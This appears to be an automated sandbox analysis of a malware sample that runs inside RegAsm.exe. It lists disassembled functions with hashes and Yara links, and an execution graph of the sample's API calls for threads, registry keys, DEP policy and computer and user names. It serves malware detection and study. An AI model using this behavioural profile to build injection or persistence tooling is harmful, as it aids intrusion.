                                    Function 01451488 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2080342273.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_1450000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: lqbq
                                    • API String ID: 0-1968102735
                                    • Opcode ID: 9f3a48acded16a8f777d148280066ef5706c6380606817d0e7218f1c6c490311
                                    • Instruction ID: df4c3f3558f9bc298c2161c1c87c99ce6ee23737566672b627da81eb99ee4b19
                                    • Opcode Fuzzy Hash: 9f3a48acded16a8f777d148280066ef5706c6380606817d0e7218f1c6c490311
                                    • Instruction Fuzzy Hash: AA117C30B0020A9FD754EB7CD518B6E7BE6BF89644F200869D806AB3A5DF359D01CB95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 01450EB7 Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2080342273.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_1450000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Haq
                                    • API String ID: 0-725504367
                                    • Opcode ID: b00c0847ec9fbae382ef0da3b6cdd3b32393fa3d6a3ae0133a1269a1d4bf4e95
                                    • Instruction ID: 5f9aca724f593156e358566c7153bb32471a56ca9e21d3ebb58d808577a6c2b7
                                    • Opcode Fuzzy Hash: b00c0847ec9fbae382ef0da3b6cdd3b32393fa3d6a3ae0133a1269a1d4bf4e95
                                    • Instruction Fuzzy Hash: 6C01AF307482514FC38A9F7D94545AE7BE6EFDA26032644FAD14ACB3A6CE788C07C791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 01450B10 Relevance: .1, Instructions: 125COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2080342273.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_1450000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f4379b3f032b1f80e485967df5d66ff8ff45b841714a238458cf8aed74e1fc45
                                    • Instruction ID: 11845dcc3eeb9ae3e882ac9d41c7129e791826be3e1a8c22bf800950050709d4
                                    • Opcode Fuzzy Hash: f4379b3f032b1f80e485967df5d66ff8ff45b841714a238458cf8aed74e1fc45
                                    • Instruction Fuzzy Hash: 9151D370A40201DFC75ADF2CF54C9593B7AFB893853118668CC068B228DB39AC6ACF80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 014509D0 Relevance: .1, Instructions: 91COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2080342273.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_1450000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b7d09005078e2c35e066c43265cb0499aa5dd6c568c56044f9a43590b29c8331
                                    • Instruction ID: 37d9473f8e4ee5d787ad3e15527ad060afb72315b26fe0fa3b58bedad7753177
                                    • Opcode Fuzzy Hash: b7d09005078e2c35e066c43265cb0499aa5dd6c568c56044f9a43590b29c8331
                                    • Instruction Fuzzy Hash: D3316F34B102029FDBB59B7A991C27B3AA4EF64341704563ABD07C7276EA748C428F51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 014509E0 Relevance: .1, Instructions: 85COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2080342273.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_1450000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cbe1703716e51bd4f1e64c9f6f440ca39017f9648eea9a5c1d57469571aa0434
                                    • Instruction ID: da24292b39ee513c7c1bc76c4503521c16fdb6db63633dbe29761ead65913623
                                    • Opcode Fuzzy Hash: cbe1703716e51bd4f1e64c9f6f440ca39017f9648eea9a5c1d57469571aa0434
                                    • Instruction Fuzzy Hash: 293150387102029FDBB5AB7EA51826F3AA4EF24345704412ABD07CB276EA308C01CB62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 013FD3B4 Relevance: .1, Instructions: 75COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2079955724.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_13fd000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ae3af62e64df581d767990155e6db45e7a7f70e2627a128b09782fd3d9972100
                                    • Instruction ID: 5815a680264bd375176f796378623f83d9f4f204854cc72fecb2761e2a39a671
                                    • Opcode Fuzzy Hash: ae3af62e64df581d767990155e6db45e7a7f70e2627a128b09782fd3d9972100
                                    • Instruction Fuzzy Hash: 79216771500204DFDB05CF98D9C8F66BF65FB84318F20C56DEA091B616C73AE446CBA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 013FD3AF Relevance: .1, Instructions: 56COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2079955724.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_13fd000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 07d586b370810bf15e8d939e07fb0dccd80900219e7a08ccebccaf9c83e80135
                                    • Instruction ID: fb14bb57def899ff2a9d58c8e5e488dd5d6072d4902b90aa89a38bf2c43a4990
                                    • Opcode Fuzzy Hash: 07d586b370810bf15e8d939e07fb0dccd80900219e7a08ccebccaf9c83e80135
                                    • Instruction Fuzzy Hash: 1411E172404280CFDB02CF54D9C4B56BF71FB84318F24C5ADD9494B616C336E45ACBA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 01450EF8 Relevance: .0, Instructions: 24COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2080342273.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_1450000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 187f8dee3dd31042bd67c03b69299a15c2a361fb853bd2fb3565ea254f97edf9
                                    • Instruction ID: ace8fb1264c32f6d9c1f00c7617d3c1ba44f24a01119dd1edbe7096ed31ef89e
                                    • Opcode Fuzzy Hash: 187f8dee3dd31042bd67c03b69299a15c2a361fb853bd2fb3565ea254f97edf9
                                    • Instruction Fuzzy Hash: 0AE08C313001005F83449B2EA88485AB7EAEBC812531544B9E10EC7361CD60DC024390
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Executed Functions

                                    Function 01480F30 Relevance: 2.7, Strings: 2, Instructions: 156COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.2084981014.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_1480000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (aq$Te]q
                                    • API String ID: 0-2961548996
                                    • Opcode ID: 7e63140745fcc5b19a48ba8ec968b1daa99fa83dcc38a7dd6905801e2d6bc07d
                                    • Instruction ID: 6df5b48f9a353df9e51f88a9d2149f6fe56d433f2dcf9fb136e3d683f398c2c1
                                    • Opcode Fuzzy Hash: 7e63140745fcc5b19a48ba8ec968b1daa99fa83dcc38a7dd6905801e2d6bc07d
                                    • Instruction Fuzzy Hash: 87518170B101148FC748DF69C458A5EBBF2FF89B00F2581AAE416DB3A5CB71DC028B90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 01480D98 Relevance: 2.6, Strings: 2, Instructions: 129COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.2084981014.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_1480000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Haq$dLcq
                                    • API String ID: 0-1713614415
                                    • Opcode ID: d8c0af0afd98bf1152620cc20390075082fa4e4e8d9a99092db37a8e3db74773
                                    • Instruction ID: 3f302eb1fc6b08948c3e70a585ece195feaac0ef3a500ca7ff572ddf6bf43635
                                    • Opcode Fuzzy Hash: d8c0af0afd98bf1152620cc20390075082fa4e4e8d9a99092db37a8e3db74773
                                    • Instruction Fuzzy Hash: 0B41A1317002048FDB199F79D454AAEBBF6FF89310F1845AAE105DB3A1CB749C05CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 01481248 Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.2084981014.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_1480000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: LR]q
                                    • API String ID: 0-3081347316
                                    • Opcode ID: 549d4fbece3a75e0431608d96277173da2af61a320c0e09aafc6830546c8e986
                                    • Instruction ID: 95a302ea757e762801c23bcac42fb7c51d72edd4b9c6e3cdd3eb3cd149044db0
                                    • Opcode Fuzzy Hash: 549d4fbece3a75e0431608d96277173da2af61a320c0e09aafc6830546c8e986
                                    • Instruction Fuzzy Hash: 49519070B002059FDB08EFBDC55466EBBF6EF88710F24846AD45AEB365DA34DC428B91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 01480969 Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.2084981014.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_1480000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4']q
                                    • API String ID: 0-1259897404
                                    • Opcode ID: f8ac54f28ff4cc401e9a670517cc0bacf46620333d243ddad58b01a731e26d95
                                    • Instruction ID: e3898e8910e44cb6c2afdcd7c3b6ed5a9d18ccab40d1b9a0c213fad9c0619fb2
                                    • Opcode Fuzzy Hash: f8ac54f28ff4cc401e9a670517cc0bacf46620333d243ddad58b01a731e26d95
                                    • Instruction Fuzzy Hash: 1241F4306282829FDB69BF78D41423EBFA5BF11204B44057EE456C7261EB309949C752
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 01480D8E Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.2084981014.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_1480000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: dLcq
                                    • API String ID: 0-2236789282
                                    • Opcode ID: 04c60fae265a6c120534d72597404c63548eec6d47d34669a680fdf1b78e300f
                                    • Instruction ID: fc315f043f64636b838b771c6cca5b475cf38f8b18438e8a4612451e888c4ee7
                                    • Opcode Fuzzy Hash: 04c60fae265a6c120534d72597404c63548eec6d47d34669a680fdf1b78e300f
                                    • Instruction Fuzzy Hash: 84319E71A102058FDB19DF69C598BAEBBF1FF88304F1445AAE401AB3A1CB75DC49CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 01481477 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.2084981014.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_1480000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: lqbq
                                    • API String ID: 0-1968102735
                                    • Opcode ID: acd29a7c5c455efb9fa461c90c0c4f5efe4a4aa95450aa8140101aea11e81628
                                    • Instruction ID: ce96fe4c9f6deba85fa872fe35b7c0fc039e2fa63628195d36e3684de87dcee2
                                    • Opcode Fuzzy Hash: acd29a7c5c455efb9fa461c90c0c4f5efe4a4aa95450aa8140101aea11e81628
                                    • Instruction Fuzzy Hash: 832190706012059FC715EB78C55476E77F6AF89604F640879E006EB3A4DB35AD12CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 01481488 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.2084981014.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_1480000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: lqbq
                                    • API String ID: 0-1968102735
                                    • Opcode ID: 2a712b4f730a92addae71b0fc2252e13ce40acf3964a053c20a6aa6ecbc70c69
                                    • Instruction ID: 37b9db11967b8ee0823080518c29f6be926a9bdfd6753aca1da90cd4929bca39
                                    • Opcode Fuzzy Hash: 2a712b4f730a92addae71b0fc2252e13ce40acf3964a053c20a6aa6ecbc70c69
                                    • Instruction Fuzzy Hash: 0C116A70A012059FD715FB78C55476E76E6BF88604F24087AE006EB3A9DF35AD02CBA5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 01480EB7 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.2084981014.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_1480000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Haq
                                    • API String ID: 0-725504367
                                    • Opcode ID: c9cdbb393cf283be78d49b12c7fb98e5bf1d1b2e9a1aa5e0f820b55622d031cd
                                    • Instruction ID: 01acde10cde99094a91109fe07e7379b3da27d5a1cee999345811a4ef8d96623
                                    • Opcode Fuzzy Hash: c9cdbb393cf283be78d49b12c7fb98e5bf1d1b2e9a1aa5e0f820b55622d031cd
                                    • Instruction Fuzzy Hash: 7401A4307483914FC3499B3D945045E3FE6EFCB25435948FAD14ACB3A6CE248C06C392
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 01480B10 Relevance: .1, Instructions: 126COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.2084981014.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_1480000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 86a8d3fb68347fe7446ac8c53e444f6ead30bf74da2b14cd13b5ed8bf3e9c904
                                    • Instruction ID: 966714532f5b4f1a068c2655c9346bfd9f332714ae608b3b4bc0765365ad8402
                                    • Opcode Fuzzy Hash: 86a8d3fb68347fe7446ac8c53e444f6ead30bf74da2b14cd13b5ed8bf3e9c904
                                    • Instruction Fuzzy Hash: 0851C7381422459FC75AFF34F584A5A3B76EF8430575086B8E405CB26DEB35AC9ACB82
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 014809E0 Relevance: .1, Instructions: 85COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.2084981014.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_1480000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b29291d3c99ac7a7fdcff1a1d4d5aea79ac89329af36dfd086b07d3a65ef6e4e
                                    • Instruction ID: bb522b74e8bc969b0505f8bd82e9a793e2431a2e69ef6c07496284ec27ecd9b4
                                    • Opcode Fuzzy Hash: b29291d3c99ac7a7fdcff1a1d4d5aea79ac89329af36dfd086b07d3a65ef6e4e
                                    • Instruction Fuzzy Hash: E83144307242429FDBB97B79941833FBEA5BF20205744463AB917C3265FB308989C762
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0119D3B4 Relevance: .1, Instructions: 75COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.2082048467.000000000119D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0119D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_119d000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b61db8953e29739b468403f72a30425f2568e0a9ba560ce8f3ffd5240ddfda9a
                                    • Instruction ID: fc77e4e05da398eca4f0dd7b4aba9ec1ca3c3c426fcf5d4c1c582c6edded1256
                                    • Opcode Fuzzy Hash: b61db8953e29739b468403f72a30425f2568e0a9ba560ce8f3ffd5240ddfda9a
                                    • Instruction Fuzzy Hash: 952137B1504240DFDF09DF98E9C0F66BF65FB84314F24C569E9090B656C33AE456C7A2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0119D3AF Relevance: .1, Instructions: 56COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.2082048467.000000000119D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0119D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_119d000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 07d586b370810bf15e8d939e07fb0dccd80900219e7a08ccebccaf9c83e80135
                                    • Instruction ID: 2f6a6d22e8ab8ed907733b2b4df22172b75af54ea0ffd60eeb1aa6821ff4ba75
                                    • Opcode Fuzzy Hash: 07d586b370810bf15e8d939e07fb0dccd80900219e7a08ccebccaf9c83e80135
                                    • Instruction Fuzzy Hash: 7311E176404280CFCF06CF54D9C4B56BF71FB84314F24C5A9D9490BA16C336E45ACBA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 01480EF8 Relevance: .0, Instructions: 24COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.2084981014.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_1480000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4b1ec6a8693133d5fd61e4924781b737bb1c88a6cd685914a239e12111715d38
                                    • Instruction ID: 10eb637b16fdc90ba674eac9505fed4e4051c7f04d7b95e36f21a8f6bd179db6
                                    • Opcode Fuzzy Hash: 4b1ec6a8693133d5fd61e4924781b737bb1c88a6cd685914a239e12111715d38
                                    • Instruction Fuzzy Hash: 35E0C2313002005F83489B3EB88485BBBEFEFC812535544B9F10DC7355CD60DC028390
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Execution Graph

                                    Execution Coverage:4%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:5.1%
                                    Total number of Nodes:1311
                                    Total number of Limit Nodes:37
                                    execution_graph 47264 434887 47265 434893 ___scrt_is_nonwritable_in_current_image 47264->47265 47291 434596 47265->47291 47267 43489a 47269 4348c3 47267->47269 47589 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 47267->47589 47276 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47269->47276 47590 444251 5 API calls ___crtLCMapStringA 47269->47590 47271 4348dc 47273 4348e2 ___scrt_is_nonwritable_in_current_image 47271->47273 47591 4441f5 5 API calls ___crtLCMapStringA 47271->47591 47274 434962 47302 434b14 47274->47302 47276->47274 47592 4433e7 36 API calls 4 library calls 47276->47592 47284 434984 47285 43498e 47284->47285 47594 44341f 28 API calls _Atexit 47284->47594 47287 434997 47285->47287 47595 4433c2 28 API calls _Atexit 47285->47595 47596 43470d 13 API calls 2 library calls 47287->47596 47290 43499f 47290->47273 47292 43459f 47291->47292 47597 434c52 IsProcessorFeaturePresent 47292->47597 47294 4345ab 47598 438f31 10 API calls 4 library calls 47294->47598 47296 4345b0 47301 4345b4 47296->47301 47599 4440bf 47296->47599 47299 4345cb 47299->47267 47301->47267 47671 436e90 47302->47671 47305 434968 47306 4441a2 47305->47306 47673 44f059 47306->47673 47308 434971 47311 40e9c5 47308->47311 47309 4441ab 47309->47308 47677 446815 36 API calls 47309->47677 47679 41cb50 LoadLibraryA GetProcAddress 47311->47679 47313 40e9e1 GetModuleFileNameW 47684 40f3c3 47313->47684 47315 40e9fd 47699 4020f6 47315->47699 47318 4020f6 28 API calls 47319 40ea1b 47318->47319 47705 41be1b 47319->47705 47323 40ea2d 47731 401e8d 47323->47731 47325 40ea36 47326 40ea93 47325->47326 47327 40ea49 47325->47327 47737 401e65 47326->47737 47999 40fbb3 118 API calls 47327->47999 47330 40eaa3 47334 401e65 22 API calls 47330->47334 47331 40ea5b 47332 401e65 22 API calls 47331->47332 47333 40ea67 47332->47333 48000 410f37 36 API calls __EH_prolog 47333->48000 47335 40eac2 47334->47335 47742 40531e 47335->47742 47338 40ead1 47747 406383 47338->47747 47339 40ea79 48001 40fb64 78 API calls 47339->48001 47343 40ea82 48002 40f3b0 71 API calls 47343->48002 47349 401fd8 11 API calls 47351 40eefb 47349->47351 47350 401fd8 11 API calls 47352 40eafb 47350->47352 47593 4432f6 GetModuleHandleW 47351->47593 47353 401e65 22 API calls 47352->47353 47354 40eb04 47353->47354 47764 401fc0 47354->47764 47356 40eb0f 47357 401e65 22 API calls 47356->47357 47358 40eb28 47357->47358 47359 401e65 22 API calls 47358->47359 47360 40eb43 47359->47360 47361 40ebae 47360->47361 48003 406c1e 47360->48003 47362 401e65 22 API calls 47361->47362 47368 40ebbb 47362->47368 47364 40eb70 47365 401fe2 28 API calls 47364->47365 47366 40eb7c 47365->47366 47369 401fd8 11 API calls 47366->47369 47367 40ec02 47768 40d069 47367->47768 47368->47367 47374 413549 3 API calls 47368->47374 47371 40eb85 47369->47371 48008 413549 RegOpenKeyExA 47371->48008 47372 40ec08 47373 40ea8b 47372->47373 47771 41b2c3 47372->47771 47373->47349 47380 40ebe6 47374->47380 47378 40f34f 48091 4139a9 30 API calls 47378->48091 47379 40ec23 47382 40ec76 47379->47382 47788 407716 47379->47788 47380->47367 48011 4139a9 30 API calls 47380->48011 47383 401e65 22 API calls 47382->47383 47386 40ec7f 47383->47386 47395 40ec90 47386->47395 47396 40ec8b 47386->47396 47388 40f365 48092 412475 65 API calls ___scrt_get_show_window_mode 47388->48092 47389 40ec42 48012 407738 30 API calls 47389->48012 47390 40ec4c 47393 401e65 22 API calls 47390->47393 47405 40ec55 47393->47405 47394 40f36f 47398 41bc5e 28 API calls 47394->47398 47401 401e65 22 API calls 47395->47401 48015 407755 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 47396->48015 47397 40ec47 48013 407260 98 API calls 47397->48013 47402 40f37f 47398->47402 47403 40ec99 47401->47403 47897 413a23 RegOpenKeyExW 47402->47897 47792 41bc5e 47403->47792 47405->47382 47410 40ec71 47405->47410 47406 40eca4 47796 401f13 47406->47796 48014 407260 98 API calls 47410->48014 47412 401f09 11 API calls 47414 40f39c 47412->47414 47417 401f09 11 API calls 47414->47417 47419 40f3a5 47417->47419 47418 401e65 22 API calls 47420 40ecc1 47418->47420 47900 40dd42 47419->47900 47424 401e65 22 API calls 47420->47424 47426 40ecdb 47424->47426 47425 40f3af 47427 401e65 22 API calls 47426->47427 47428 40ecf5 47427->47428 47429 401e65 22 API calls 47428->47429 47430 40ed0e 47429->47430 47431 401e65 22 API calls 47430->47431 47462 40ed7b 47430->47462 47437 40ed23 _wcslen 47431->47437 47432 40ed8a 47433 40ed93 47432->47433 47458 40ee0f ___scrt_get_show_window_mode 47432->47458 47434 401e65 22 API calls 47433->47434 47436 40ed9c 47434->47436 47435 40ef06 ___scrt_get_show_window_mode 48076 4136f8 RegOpenKeyExA 47435->48076 47438 401e65 22 API calls 47436->47438 47439 401e65 22 API calls 47437->47439 47437->47462 47440 40edae 47438->47440 47441 40ed3e 47439->47441 47443 401e65 22 API calls 47440->47443 47445 401e65 22 API calls 47441->47445 47444 40edc0 47443->47444 47448 401e65 22 API calls 47444->47448 47446 40ed53 47445->47446 48016 40da34 47446->48016 47447 40ef51 47449 401e65 22 API calls 47447->47449 47451 40ede9 47448->47451 47452 40ef76 47449->47452 47456 401e65 22 API calls 47451->47456 47818 402093 47452->47818 47454 401f13 28 API calls 47455 40ed72 47454->47455 47459 401f09 11 API calls 47455->47459 47460 40edfa 47456->47460 47808 413947 47458->47808 47459->47462 48074 40cdf9 45 API calls _wcslen 47460->48074 47461 40ef88 47824 41376f RegCreateKeyA 47461->47824 47462->47432 47462->47435 47467 40eea3 ctype 47471 401e65 22 API calls 47467->47471 47468 40ee0a 47468->47458 47469 401e65 22 API calls 47470 40efaa 47469->47470 47830 43baac 47470->47830 47472 40eeba 47471->47472 47472->47447 47475 40eece 47472->47475 47477 401e65 22 API calls 47475->47477 47476 40efc1 48079 41cd9b 87 API calls ___scrt_get_show_window_mode 47476->48079 47479 40eed7 47477->47479 47478 40efe4 47481 402093 28 API calls 47478->47481 47482 41bc5e 28 API calls 47479->47482 47484 40eff9 47481->47484 47485 40eee3 47482->47485 47483 40efc8 CreateThread 47483->47478 48926 41d45d 10 API calls 47483->48926 47486 402093 28 API calls 47484->47486 48075 40f474 104 API calls 47485->48075 47488 40f008 47486->47488 47834 41b4ef 47488->47834 47489 40eee8 47489->47447 47491 40eeef 47489->47491 47491->47373 47493 401e65 22 API calls 47494 40f019 47493->47494 47495 401e65 22 API calls 47494->47495 47496 40f02b 47495->47496 47497 401e65 22 API calls 47496->47497 47498 40f04b 47497->47498 47499 43baac _strftime 40 API calls 47498->47499 47500 40f058 47499->47500 47501 401e65 22 API calls 47500->47501 47502 40f063 47501->47502 47503 401e65 22 API calls 47502->47503 47504 40f074 47503->47504 47505 401e65 22 API calls 47504->47505 47506 40f089 47505->47506 47507 401e65 22 API calls 47506->47507 47508 40f09a 47507->47508 47509 40f0a1 StrToIntA 47508->47509 47858 409de4 47509->47858 47512 401e65 22 API calls 47513 40f0bc 47512->47513 47514 40f101 47513->47514 47515 40f0c8 47513->47515 47517 401e65 22 API calls 47514->47517 48080 4344ea 47515->48080 47519 40f111 47517->47519 47523 40f159 47519->47523 47524 40f11d 47519->47524 47520 401e65 22 API calls 47521 40f0e4 47520->47521 47522 40f0eb CreateThread 47521->47522 47522->47514 48923 419fb4 103 API calls 2 library calls 47522->48923 47525 401e65 22 API calls 47523->47525 47526 4344ea new 22 API calls 47524->47526 47527 40f162 47525->47527 47528 40f126 47526->47528 47531 40f1cc 47527->47531 47532 40f16e 47527->47532 47529 401e65 22 API calls 47528->47529 47530 40f138 47529->47530 47535 40f13f CreateThread 47530->47535 47533 401e65 22 API calls 47531->47533 47534 401e65 22 API calls 47532->47534 47536 40f1d5 47533->47536 47537 40f17e 47534->47537 47535->47523 48928 419fb4 103 API calls 2 library calls 47535->48928 47538 40f1e1 47536->47538 47539 40f21a 47536->47539 47540 401e65 22 API calls 47537->47540 47542 401e65 22 API calls 47538->47542 47883 41b60d GetComputerNameExW GetUserNameW 47539->47883 47543 40f193 47540->47543 47545 40f1ea 47542->47545 48087 40d9e8 31 API calls 47543->48087 47550 401e65 22 API calls 47545->47550 47546 401f13 28 API calls 47547 40f22e 47546->47547 47549 401f09 11 API calls 47547->47549 47553 40f237 47549->47553 47554 40f1ff 47550->47554 47551 40f1a6 47552 401f13 28 API calls 47551->47552 47555 40f1b2 47552->47555 47556 40f240 SetProcessDEPPolicy 47553->47556 47557 40f243 CreateThread 47553->47557 47563 43baac _strftime 40 API calls 47554->47563 47558 401f09 11 API calls 47555->47558 47556->47557 47559 40f264 47557->47559 47560 40f258 CreateThread 47557->47560 48896 40f7a7 47557->48896 47564 40f1bb CreateThread 47558->47564 47561 40f279 47559->47561 47562 40f26d CreateThread 47559->47562 47560->47559 48924 4120f7 138 API calls 47560->48924 47566 40f2cc 47561->47566 47568 402093 28 API calls 47561->47568 